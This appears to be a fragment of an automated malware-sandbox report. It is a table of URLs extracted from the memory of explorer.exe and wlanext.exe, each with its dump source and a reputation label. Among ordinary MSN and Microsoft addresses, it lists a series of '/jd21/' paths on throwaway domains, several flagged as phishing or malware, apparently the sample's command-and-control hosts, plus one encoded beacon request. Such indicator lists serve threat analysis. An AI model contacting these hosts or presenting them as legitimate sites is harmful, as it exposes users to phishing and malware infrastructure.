                                    https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-oexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.msn.com/rTexplorer.exe, 00000003.00000000.1463778211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.propertiesforrentus11.bondReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.propertiesforrentus11.bond/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    unknown
                                    http://www.slab-leak-repair-74697.bondexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://word.office.comexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.pools-80761.bond/jd21/www.legendhud.shopexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.r86gd377hi.rent/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.tvtwenty20sr.top/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.thetrue.one/jd21/www.tvtwenty20sr.topexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://android.notify.windows.com/iOSJMexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.legendhud.shop/jd21/www.borghardt.xyzexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://outlook.comexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.pools-80761.bond/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.alqahtani.siteReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.apple0ficial-ld.infoReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.walk-in-tubs-30303.bond/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://android.notify.windows.com/iOSZMexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.borghardt.xyzexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.alqahtani.site/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://www.yelp.comexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.slab-leak-repair-74697.bond/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.cyber-eu.digitalReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.weight-loss-003.today/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tvtwenty20sr.topexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.r86gd377hi.rentReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.tyumk.xyzexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.circusenergy.onlineexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    http://www.alqahtani.site/jd21/www.propertiesforrentus11.bondexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.r86gd377hi.rentexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.thetrue.oneexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.slab-leak-repair-74697.bondReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/ | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.walk-in-tubs-30303.bond | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xmld101.icu/jd21/ | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xmld101.icu/jd21/www.walk-in-tubs-30303.bond | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.micro | explorer.exe, 00000003.00000000.1455128330.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1461856783.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3850369503.00000000082D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cyber-eu.digital/jd21/www.weight-loss-003.today | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://parade.com/61481/toriavey/where-did-hamburgers-originate | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.circusenergy.online/jd21/www.cyber-eu.digital | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.tyumk.xyzReferer: | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.borghardt.xyz/jd21/ | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tvtwenty20sr.top/jd21/www.pools-80761.bond | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch- | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yR | explorer.exe, 00000003.00000002.3861185504.00000000108FF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.00000000042DF000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com/~T | explorer.exe, 00000003.00000000.1463778211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008796000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.walk-in-tubs-30303.bond/jd21/www.r86gd377hi.rent | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.weight-loss-003.today/jd21/www.xmld101.icu | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.weight-loss-003.todayReferer: | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.slab-leak-repair-74697.bond/jd21/www.tyumk.xyz | explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09 | explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
